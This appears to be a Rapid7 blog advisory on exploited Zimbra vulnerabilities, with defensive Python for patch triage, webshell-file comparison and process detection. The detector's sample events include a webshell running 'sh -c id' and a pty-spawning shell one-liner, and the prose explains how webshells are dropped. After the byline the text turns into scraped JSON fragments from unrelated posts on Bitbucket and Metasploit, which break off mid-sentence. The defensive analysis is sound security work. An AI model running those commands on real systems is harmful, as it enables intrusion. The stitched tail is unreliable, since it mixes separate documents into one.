# Active Exploitation of Multiple Vulnerabilities in Zimbra Collaboration Suite
Over the past few weeks, five different vulnerabilities affecting [Zimbra Collaboration Suite](<https://www.zimbra.com/>) have come to our attention, one of which is unpatched, and four of which are being actively and widely exploited in the wild by well-organized threat actors. We urge organizations who use Zimbra to patch to the **[latest version](<https://wiki.zimbra.com/wiki/Zimbra_Releases>)** on an urgent basis, and to upgrade future versions as quickly as possible once they are released.
## Exploited RCE vulnerabilities
The following vulnerabilities can be used for remote code execution and are being [exploited in the wild](<https://www.cisa.gov/uscert/ncas/alerts/aa22-228a>).
### CVE-2022-30333
[CVE-2022-30333](<https://nvd.nist.gov/vuln/detail/CVE-2022-30333>) is a path traversal vulnerability in `unRAR`, RARLAB's command line utility for extracting RAR archives. On Unix builds, `unrar` rewrites backslashes in a symbolic link's target to forward slashes after it has already checked that target for traversal, so a crafted archive can create a symlink that points outside the extraction directory and then write a file through it. The result is that an attacker can write a file anywhere on the target file system as the user that executes `unrar`. Zimbra Collaboration Suite shipped a vulnerable `unrar` and invoked it from the `amavisd` component, which unpacks attachments of incoming email to inspect them for spam and malware. Zimbra addressed this issue in [9.0.0 patch 25](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25>) and [8.8.15 patch 32](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32>) by replacing `unrar` with `7z`.
Our research team has a [full analysis of CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis?referrer=blog>) in AttackerKB. A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16796>) is also available. Note that the server **does not** necessarily need to be internet-facing to be exploited — it simply needs to receive a malicious email.
### CVE-2022-27924
CVE-2022-27924 is a blind Memcached injection vulnerability [first analyzed publicly](<https://blog.sonarsource.com/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/>) in June 2022. Successful exploitation allows an attacker to set arbitrary keys in the Memcached cache to arbitrary values. Zimbra's Nginx proxy looks up per-user routing information in that cache, so in the worst case an attacker can overwrite a user's route entry with a server they control and have the proxy forward that user's credentials to them the next time the user's mail client authenticates. Combined with [CVE-2022-27925](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>), an authenticated remote code execution vulnerability, and [CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis?referrer=blog>), a currently unpatched privilege escalation issue that was publicly disclosed [in October 2021](<https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/>), capturing an administrator's password can lead to remote code execution as the root user on an organization's email server, which frequently contains sensitive data.
Our research team has a [full analysis of CVE-2022-27924](<https://attackerkb.com/topics/6vZw1iqYRY/cve-2022-27924/rapid7-analysis?referrer=blog>) in AttackerKB. Note that an attacker does need to know a username on the server in order to exploit CVE-2022-27924. According to Sonar, it is also possible to poison the cache for _any_ user by stacking multiple requests.
### CVE-2022-27925
[CVE-2022-27925](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>) is a directory traversal vulnerability in Zimbra Collaboration Suite Network Edition versions 8.8.15 and 9.0. The `mboximport` endpoint accepts an uploaded archive and extracts its entries without sanitizing their paths, so an authenticated user with administrator rights can write arbitrary files (for example a JSP webshell under the web application directories) anywhere the `zimbra` user can write. On August 10, 2022, security firm [Volexity published findings](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) from multiple customer compromise investigations that indicated CVE-2022-27925 was being exploited in combination with a zero-day authentication bypass, now assigned CVE-2022-37042, that allowed attackers to leverage CVE-2022-27925 _without_ authentication.
**Note:** Although the public advisories don't mention it, our testing indicated that Zimbra Collaboration Suite Network Edition (the paid edition) is vulnerable and that the Open Source Edition (free) is not, since it does not have the vulnerable `mboximport` endpoint. Vulnerable versions are:
* Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
* Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)
Our research team has a [full analysis of CVE-2022-27925](<https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis>) in AttackerKB.
### CVE-2022-37042
As noted above, CVE-2022-37042 is a critical authentication bypass that arises from an incomplete fix for CVE-2022-27925: after the fix Zimbra shipped for CVE-2022-27925 (9.0.0 P24 and 8.8.15 P31), the `mboximport` endpoint could still be reached, and its directory traversal exploited, without an authentication token. Zimbra patched CVE-2022-37042 in [9.0.0 P26](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P26>) and [8.8.15 P33](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P33>).
## Unpatched privilege escalation CVE-2022-37393
In October of 2021, researcher Darren Martyn [published an exploit](<https://github.com/darrenmartyn/zimbra-slapper/>) for a zero-day [root privilege escalation vulnerability](<https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/>) in Zimbra Collaboration Suite. The `zimbra` user is permitted to run Zimbra's `zmslapd` (OpenLDAP `slapd`) binary as root via `sudo`, and `slapd` will load a shared object named in a caller-supplied configuration file, so anyone with a shell as the `zimbra` user can escalate to root. While this issue requires a local account on the Zimbra host, the other vulnerabilities in this post offer plenty of opportunity to obtain one.
Our research team tested the privilege escalation in combination with CVE-2022-30333 at the end of July 2022, as well as the fully patched version on August 17, 2022, and found that all versions of Zimbra were affected through at least 9.0.0 P26 and 8.8.15 P33. Rapid7 disclosed the vulnerability to Zimbra on July 21, 2022 and later assigned [CVE-2022-37393](<https://nvd.nist.gov/vuln/detail/CVE-2022-37393>) (still awaiting NVD analysis) to track it. A [full analysis of CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis?referrer=blog>) is available in AttackerKB. A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16807>) is also available.
## Mitigation guidance
We strongly advise that all organizations that use Zimbra in their environments update to the latest available version (at time of writing, the latest versions available are 9.0.0 P26 and 8.8.15 P33) to remediate known remote code execution vectors. We also advise monitoring [Zimbra's release communications](<https://wiki.zimbra.com/wiki/Zimbra_Releases>) for future security updates, and patching on an urgent basis when new versions become available.
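To check an instance against the fix levels given in this post, here is an added example (not code from the original post or from Zimbra) that parses the output of `zmcontrol -v` and lists which of the CVEs above the install is still exposed to. It assumes the output looks like `Release 9.0.0.GA.4390.UBUNTU20.64 UBUNTU20_64 NETWORK edition, Patch 9.0.0_P23.` (the build number and OS tag are placeholders), treats an interim level such as `P24.1` as its base level, and omits CVE-2022-27924 because this post does not state its fixed patch level. The fix level for CVE-2022-27925 is derived from the "Patch 23 / Patch 30 and earlier" vulnerable ranges above.

```python
import re
import subprocess

# First patch level that fixes each CVE, per branch, as stated in this post.
# None: no fix was available at the time of writing (CVE-2022-37393).
FIXED_IN = {
    "CVE-2022-30333": {"9.0.0": 25, "8.8.15": 32},
    "CVE-2022-27925": {"9.0.0": 24, "8.8.15": 31},   # derived from "P23 / P30 and earlier"
    "CVE-2022-37042": {"9.0.0": 26, "8.8.15": 33},
    "CVE-2022-37393": None,
}
# The mboximport issues exist only in Network Edition.
NETWORK_EDITION_ONLY = {"CVE-2022-27925", "CVE-2022-37042"}

# Assumed `zmcontrol -v` format; an interim level such as P24.1 parses as 24.
_RELEASE_RE = re.compile(
    r"Release\s+(?P<version>\d+\.\d+\.\d+)\S*\s+\S+\s+(?P<edition>FOSS|NETWORK)\s+edition"
    r"(?:,\s*Patch\s+\d+\.\d+\.\d+_P(?P<patch>\d+))?"
)


def parse_zmcontrol_version(output):
    """Return {'version', 'edition', 'patch'} parsed from zmcontrol -v output."""
    m = _RELEASE_RE.search(output)
    if not m:
        raise ValueError("unrecognised zmcontrol -v output: %r" % output)
    return {
        "version": m.group("version"),
        "edition": m.group("edition"),
        "patch": int(m.group("patch") or 0),  # GA release with no patch applied -> 0
    }


def outstanding_cves(info):
    """CVEs from this post that the described install is still exposed to."""
    missing = []
    for cve, fixed in FIXED_IN.items():
        if cve in NETWORK_EDITION_ONLY and info["edition"] != "NETWORK":
            continue
        if fixed is None or info["version"] not in fixed:
            # No fix at all, or a branch this post gives no fix level for (e.g. 8.7.x):
            # report it as exposed rather than silently passing.
            missing.append(cve)
        elif info["patch"] < fixed[info["version"]]:
            missing.append(cve)
    return missing


def triage(output):
    return outstanding_cves(parse_zmcontrol_version(output))


if __name__ == "__main__":
    # Run on the server itself as the zimbra user, e.g. `su - zimbra -c 'python3 triage.py'`.
    out = subprocess.run(["/opt/zimbra/bin/zmcontrol", "-v"],
                         capture_output=True, text=True).stdout
    for cve in triage(out) or ["none of the CVEs listed in this post"]:
        print(cve)
```

A Network Edition 9.0.0 P23 host comes back with all four tracked CVEs; a FOSS 9.0.0 P26 host only with CVE-2022-37393, which had no fix at the time of writing.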
The AttackerKB analyses for [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis?referrer=blog>), [CVE-2022-27924](<https://attackerkb.com/topics/6vZw1iqYRY/cve-2022-27924/rapid7-analysis?referrer=blog>), [CVE-2022-27925](<https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis>), and [CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis?referrer=blog>) all include vulnerability details (including proofs of concept) and sample indicators of compromise (IOCs). Volexity’s [blog](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) also has information on how to look for webshells dropped on Zimbra instances, such as comparing the list of JSP files on a Zimbra instance with those present by default in Zimbra installations. They have published [lists of valid JSP files included in Zimbra installations](<https://github.com/volexity/threat-intel/tree/main/2022/2022-08-10%20Mass%20exploitation%20of%20\(Un\)authenticated%20Zimbra%20RCE%20CVE-2022-27925>) for the latest version of 8.8.15 and of 9.0.0 (at time of writing).
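The JSP comparison Volexity describes, as an added example that is not part of the original post or of Volexity's tooling: it normalizes both the known-good list and the files actually on disk to paths relative to `/opt/zimbra` and reports whatever is on disk but not in the list. It assumes the baseline is one path per line (absolute or relative to the install root, `#` comments allowed); the baseline and directory listing below are constructed sample data, not the real Volexity list.

```python
import os
from pathlib import PurePosixPath

ZIMBRA_ROOT = "/opt/zimbra"


def normalize(path, root=ZIMBRA_ROOT):
    """Collapse a path to a clean form relative to the Zimbra install root.

    The baseline may list paths absolute or relative; os.walk yields absolute
    paths. Reducing both to the same form makes them comparable.
    """
    p = PurePosixPath(path.strip())
    if p.is_absolute():
        try:
            p = p.relative_to(root)
        except ValueError:
            pass  # a JSP outside /opt/zimbra stays absolute and is therefore always reported
    return str(p)


def load_baseline(text, root=ZIMBRA_ROOT):
    """Parse a one-path-per-line known-good list; blank lines and # comments are ignored."""
    return {normalize(line, root) for line in text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")}


def jsp_on_disk(root=ZIMBRA_ROOT):
    """Yield every .jsp file under the install root (run on the server as root)."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".jsp"):
                yield os.path.join(dirpath, name)


def unexpected_jsp(found, baseline, root=ZIMBRA_ROOT):
    """JSP files present on disk that the known-good list does not account for."""
    return sorted({normalize(p, root) for p in found} - baseline)


# Constructed sample data: a short stand-in for the known-good list, and a
# listing in which one extra JSP has appeared.
SAMPLE_BASELINE = """\
# known-good JSPs (constructed example, not the real Volexity list)
/opt/zimbra/jetty_base/webapps/zimbra/public/launchZCS.jsp
/opt/zimbra/jetty_base/webapps/zimbra/public/error.jsp
jetty_base/webapps/zimbraAdmin/public/launchZCS.jsp
"""
SAMPLE_FOUND = [
    "/opt/zimbra/jetty_base/webapps/zimbra/public/launchZCS.jsp",
    "/opt/zimbra/jetty_base/webapps/zimbra/public/error.jsp",
    "/opt/zimbra/jetty_base/webapps/zimbraAdmin/public/launchZCS.jsp",
    "/opt/zimbra/jetty_base/webapps/zimbraAdmin/public/example_dropped.jsp",
    "/opt/zimbra/jetty_base/webapps/zimbra/public/./error.jsp",  # same file, messy path
]

if __name__ == "__main__":
    # Real use: save the published list as zimbra-known-jsp.txt next to this script.
    with open("zimbra-known-jsp.txt") as fh:
        baseline = load_baseline(fh.read())
    for p in unexpected_jsp(jsp_on_disk(), baseline):
        print("UNEXPECTED JSP:", p)
```

Make sure the baseline you use matches the exact patch level of the host; a list for 9.0.0 P26 will flag legitimate files on a P25 host and vice versa.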
Finally, we recommend restricting internet access to Zimbra servers wherever possible and [configuring Zimbra to block external access to Memcached](<https://wiki.zimbra.com/wiki/Blocking_Memcached_Attack>) (TCP port 11211 by default), even on patched versions of Zimbra.
## Rapid7 customers
**InsightVM and Nexpose:** Vulnerability checks for all five Zimbra CVEs are available via a content-only update as of August 18, 3pm ET.
**InsightIDR:** Customers should look for alerts generated by InsightIDR’s built-in detection rules from systems monitored by the Insight Agent. Alerts generated by the following rules may be indicative of related malicious activity:
* Suspicious Process - Zimbra Collaboration Suite Webserver Spawns Script Interpreter
* Suspicious Process - “Zimbra” User Runs Shell or Script Interpreter
The Rapid7 MDR (Managed Detection & Response) SOC is monitoring for this activity and will escalate confirmed malicious activity to managed customers immediately.
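The two rule names above describe the behaviour to look for; as an added example that is not InsightIDR's rule logic or Rapid7 code, here is a small evaluator over process-creation events that implements both and can be run against any EDR or auditd export you can flatten to the same fields. Field names (`user`, `exe`, `cmdline`, `parent_exe`, `parent_cmdline`) and the way mailboxd is recognised (a JVM under `/opt/zimbra` whose command line mentions `mailboxd`) are assumptions, and the events are constructed.

```python
import os

# Interpreters whose appearance under the Zimbra web tier is worth alerting on.
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python2", "python3", "perl", "php"}
ZIMBRA_ROOT = "/opt/zimbra/"
SCHEDULERS = {"cron", "crond", "CRON", "anacron"}


def _base(path):
    return os.path.basename(path or "")


def is_interpreter(exe):
    return _base(exe) in INTERPRETERS


def is_zimbra_webserver(parent_exe, parent_cmdline):
    # mailboxd (Zimbra's Jetty-based webserver) is a JVM shipped under /opt/zimbra;
    # the cmdline check keeps Zimbra's other JVMs from matching. Assumed format.
    return (parent_exe.startswith(ZIMBRA_ROOT)
            and _base(parent_exe) == "java"
            and "mailboxd" in parent_cmdline)


def is_expected_zimbra_tooling(parent_exe, cmdline):
    # Zimbra's own scripts (zmcontrol, zmprov, libexec cron jobs) run shells and
    # perl as the zimbra user all day; suppress those so the rule is not pure noise.
    if parent_exe.startswith(ZIMBRA_ROOT):
        return True
    return _base(parent_exe) in SCHEDULERS and ZIMBRA_ROOT in cmdline


def evaluate(events):
    """Return (rule_name, event_index) for every event that trips a rule."""
    hits = []
    for i, ev in enumerate(events):
        if not is_interpreter(ev["exe"]):
            continue
        if is_zimbra_webserver(ev["parent_exe"], ev["parent_cmdline"]):
            hits.append(("zimbra_webserver_spawns_interpreter", i))
        elif ev["user"] == "zimbra" and not is_expected_zimbra_tooling(ev["parent_exe"], ev["cmdline"]):
            hits.append(("zimbra_user_runs_interpreter", i))
    return hits


# Constructed sample events: a webshell running `id`, a legitimate Zimbra cron
# job, a shell upgraded to a pty from an interactive bash, and zmcontrol's own
# helper shell.
SAMPLE_EVENTS = [
    {"user": "zimbra", "parent_exe": "/opt/zimbra/common/lib/jvm/java/bin/java",
     "parent_cmdline": "java -Djetty.home=/opt/zimbra/mailboxd org.eclipse.jetty.start.Main",
     "exe": "/bin/sh", "cmdline": "sh -c id"},
    {"user": "zimbra", "parent_exe": "/usr/sbin/cron", "parent_cmdline": "/usr/sbin/CRON -f",
     "exe": "/bin/sh", "cmdline": "/bin/sh -c /opt/zimbra/libexec/zmstatuslog"},
    {"user": "zimbra", "parent_exe": "/bin/bash", "parent_cmdline": "bash -i",
     "exe": "/usr/bin/python3", "cmdline": "python3 -c import pty;pty.spawn('/bin/bash')"},
    {"user": "zimbra", "parent_exe": "/opt/zimbra/common/bin/perl",
     "parent_cmdline": "/opt/zimbra/bin/zmcontrol status",
     "exe": "/bin/sh", "cmdline": "sh -c /opt/zimbra/bin/zmmailboxdctl status"},
]

if __name__ == "__main__":
    for rule, idx in evaluate(SAMPLE_EVENTS):
        print(rule, SAMPLE_EVENTS[idx]["cmdline"])
```

The first rule is the high-signal one: mailboxd has no business spawning a shell. The second is a broader hunt rule that needs the tooling allowlist tuned to your deployment, since the `zimbra` account legitimately runs shell and perl all day.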
_**Additional reading:**_
* _[Active Exploitation of Atlassian’s Questions for Confluence App CVE-2022-26138](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>)_
* _[Exploitation of Mitel MiVoice Connect SA CVE-2022-29499](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>)_
* _[CVE-2022-27511: Citrix ADM Remote Device Takeover](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>)_
* _[Active Exploitation of Confluence CVE-2022-26134](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>)_
_Caitlin Condon, Rapid7 Blog, published August 17, 2022. Original post: https://blog.rapid7.com/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/_
Stay tuned for more great things, and have a happy autumn.\n\n_**Additional reading:**_\n\n * _[The 2022 SANS Top New Attacks and Threats Report Is In, and It's Required Reading](<https://www.rapid7.com/blog/post/2022/09/14/the-2022-sans-top-new-attacks-and-threats-report-is-in-and-its-required-reading/>)_\n * _[InsightVM: Best Practices to Improve Your Console](<https://www.rapid7.com/blog/post/2022/09/12/insightvm-best-practices-to-improve-your-console/>)_\n * _[5 Steps for Dealing With Unknown Environments in InsightVM](<https://www.rapid7.com/blog/post/2022/09/06/5-steps-for-dealing-with-unknown-environments-in-insightvm/>)_\n * _[What\u2019s New in InsightVM and Nexpose: Q2 2022 in Review](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-28T14:11:35", "type": "rapid7blog", "title": "What\u2019s New in InsightVM and Nexpose: Q3 2022 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-22005", "CVE-2022-26134", "CVE-2022-26138", "CVE-2022-27511", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-29499", "CVE-2022-30333", "CVE-2022-36804", "CVE-2022-37042", "CVE-2022-37393"], "modified": "2022-09-28T14:11:35", "id": "RAPID7BLOG:619370773CDB77FA0DBA52EC74E4B159", "href": "https://blog.rapid7.com/2022/09/28/whats-new-in-insightvm-and-nexpose-q3-2022-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-26T16:04:26", "description": "\n\nOn August 24, 2022, Atlassian published [an advisory for Bitbucket Server and Data Center](<https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html>) alerting users to [CVE-2022-36804](<https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis/?utm_source=rapid7-blog&utm_medium=referral&utm_campaign=etr-atlassian-bitbucket>). The advisory reveals a command injection vulnerability in multiple API endpoints, which allows an attacker with access to a public repository or with **read permissions** to a private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. CVE-2022-36804 carries a CVSSv3 score of 9.8 and is easily exploitable. Rapid7\u2019s vulnerability research team has a [full technical analysis in AttackerKB](<https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis/?utm_source=rapid7-blog&utm_medium=referral&utm_campaign=etr-atlassian-bitbucket>), including how to use CVE-2022-36804 to create a simple reverse shell.\n\n[According to Shodan](<https://www.shodan.io/search?query=http.component%3A%22atlassian+bitbucket%22>), there are about 1,400 internet-facing servers, but it\u2019s not immediately obvious how many have a public repository. 
There are no public reports of exploitation in the wild as of September 20, 2022 (edit: see note below), but there has been strong interest in the vulnerability from researchers and exploit brokers, and there are now multiple public exploits available. Because the vulnerability is trivially exploitable and the patch is relatively simple to reverse-engineer, it\u2019s likely that targeted exploitation has already occurred in the wild. We expect to see larger-scale exploitation of CVE-2022-36804 soon.\n\n**Note:** Several threat intelligence sources [reported](<https://twitter.com/Shadowserver/status/1573300004072132608>) seeing exploitation attempts in the wild as of September 23, 2022.\n\n**Affected products:** \nBitbucket Server and Data Center 7.6 prior to 7.6.17 \nBitbucket Server and Data Center 7.17 prior to 7.17.10 \nBitbucket Server and Data Center 7.21 prior to 7.21.4 \nBitbucket Server and Data Center 8.0 prior to 8.0.3 \nBitbucket Server and Data Center 8.1 prior to 8.1.3 \nBitbucket Server and Data Center 8.2 prior to 8.2.2 \nBitbucket Server and Data Center 8.3 prior to 8.3.1\n\n## Mitigation guidance\n\nOrganizations that use Bitbucket Server and Data Center in their environments should patch as quickly as possible [using Atlassian's guide](<https://confluence.atlassian.com/bitbucketserver/bitbucket-server-upgrade-guide-776640551.html>), without waiting for a regular patch cycle to occur. 
Blocking network access to Bitbucket may also function as a temporary stop-gap solution, but this should not be a substitute for patching.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-36804 with an unauthenticated vulnerability check in the September 20, 2022 content release (`ContentOnly-content-1.1.2653-202209202050`).\n\nA detection rule, `Suspicious Process - Atlassian BitBucket Spawns Suspicious Commands`, was deployed to InsightIDR around 10am ET on September 22, 2022.\n\n## Updates\n\n**September 22, 2022 10:00AM ET** \nUpdated Rapid7 customers section to include information on a new IDR detection rule.\n\n**September 26, 2022 10:30 AM EDT** \nUpdated to reflect reports of exploitation in the wild.\n\n_**Additional reading:**_\n\n * _[Active Exploitation of Multiple Vulnerabilities in Zimbra Collaboration Suite](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>)_\n * _[Active Exploitation of Atlassian\u2019s Questions for Confluence App CVE-2022-26138](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>)_\n * _[Exploitation of Mitel MiVoice Connect SA CVE-2022-29499](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>)_\n * _[CVE-2022-27511: Citrix ADM Remote Device Takeover](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-20T15:14:26", "type": "rapid7blog", "title": "CVE-2022-36804: Easily Exploitable Vulnerability in Atlassian Bitbucket Server and Data Center", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138", "CVE-2022-27511", "CVE-2022-29499", "CVE-2022-36804"], "modified": "2022-09-20T15:14:26", "id": "RAPID7BLOG:BCF3916E38EC7840E9BABBDD5431352B", "href": "https://blog.rapid7.com/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-26T22:02:56", "description": "## Zimbra Auth Bypass to Shell\n\n\n\n[Ron Bowes](<https://github.com/rbowes-r7>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/16922>) that targets multiple versions of Zimbra Collaboration Suite. The module leverages an authentication bypass (CVE-2022-37042) and a directory traversal vulnerability (CVE-2022-27925) to gain code execution as the `zimbra` user. The auth bypass functionality correctly checks for a valid session; however, the function that performs the check does not return and instead proceeds with execution. Because of this, an attacker only needs a valid account to get a shell. 
The directory traversal vulnerability lives in Zimbra\u2019s Zip file extraction functionality, enabling an attacker to write an arbitrary file to a web directory. Coupling those two vulnerabilities together, the module writes a JSP shell to the target via a POST request to the `/mboximport` endpoint. These vulnerabilities have been [reported](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) as exploited in the wild.\n\n## Another Deserialization Flaw in Exchange\n\nOur very own [zeroSteiner](<https://github.com/zeroSteiner>) submitted a new [module](<https://github.com/rapid7/metasploit-framework/pull/16915>) that exploits an authenticated .Net deserialization vulnerability in Microsoft Exchange. The vulnerability is due to a flaw in the `ChainedSerializationBinder`, a type validator for serialized data. Provided the attacker has credentials for at least a low-privileged user, this exploit will result in code execution as `NT AUTHORITY\\SYSTEM`.\n\n## New module content (2)\n\n * [Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)](<https://github.com/rapid7/metasploit-framework/pull/16922>) by Ron Bowes, Volexity Threat Research, and Yang_99's Nest, which exploits [CVE-2022-37042](<https://attackerkb.com/topics/BLL1VR8x6z/cve-2022-37042?referrer=blog>) \\- adds a module for CVE-2022-27925 and CVE-2022-37042. 
An attacker can exploit these issues to bypass authentication and then exploit a ZIP file path directory traversal vulnerability to gain RCE as the `zimbra` user.\n * [#16915](<https://github.com/rapid7/metasploit-framework/pull/16915>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- A new module has been added for CVE-2022-23277 which is another ChainedSerializationBinder bypass that results in RCE on vulnerable versions of Exchange prior to the March 8th 2022 security updates.\n\n## Enhancements and features (6)\n\n * [#16701](<https://github.com/rapid7/metasploit-framework/pull/16701>) from [jbaines-r7](<https://github.com/jbaines-r7>) \\- This improves the original `auxiliary/scanner/http/cisco_asa_asdm` scanner module by adding the ability to brute force the Cisco ASA's Clientless SSL VPN (webvpn) interface. The old module has been replaced by two new modules, this one and `auxiliary/scanner/http/cisco_asa_asdm_bruteforce`, which provide brute force of the Cisco ASA's ASDM interface directly.\n * [#16898](<https://github.com/rapid7/metasploit-framework/pull/16898>) from [bcoles](<https://github.com/bcoles>) \\- This adds a `Msf::Post::Windows::Accounts.domain_controller?` method and removes `is_dc?` methods from several modules in favor of using the new method.\n * [#16899](<https://github.com/rapid7/metasploit-framework/pull/16899>) from [bcoles](<https://github.com/bcoles>) \\- This removes the `domain_list_gen` Meterpreter script which has been replaced by the `post/windows/gather/enum_domain_group_users` post module.\n * [#16907](<https://github.com/rapid7/metasploit-framework/pull/16907>) from [bcoles](<https://github.com/bcoles>) \\- This improves the MS10-092 LPE exploit module. It uses the new task manager mixin, adds additional module metadata, and documentation.\n * [#16912](<https://github.com/rapid7/metasploit-framework/pull/16912>) from [bcoles](<https://github.com/bcoles>) \\- This removes the sound recorder Meterpreter script. 
It has been replaced by the record_mic post module.\n * [#16938](<https://github.com/rapid7/metasploit-framework/pull/16938>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The `ldap_query` module has been updated to allow the stored query templates to specify a Base DN prefix. Additionally, two ADCS-related queries were added that use this prefix to enumerate certificate authorities and certificate templates.\n\n## Bugs fixed (4)\n\n * [#16925](<https://github.com/rapid7/metasploit-framework/pull/16925>) from [rbowes-r7](<https://github.com/rbowes-r7>) \\- This fixes some issues with the payload generation in the UnRAR generic exploit module (CVE-2022-30333). This also adds the option to provide a custom payload.\n * [#16931](<https://github.com/rapid7/metasploit-framework/pull/16931>) from [bcoles](<https://github.com/bcoles>) \\- A bug has been fixed in `Rex::Post::Meterpreter::Extensions::Stdapi::AudioOutput.play_file` where a channel would be opened before the path parameter was verified. 
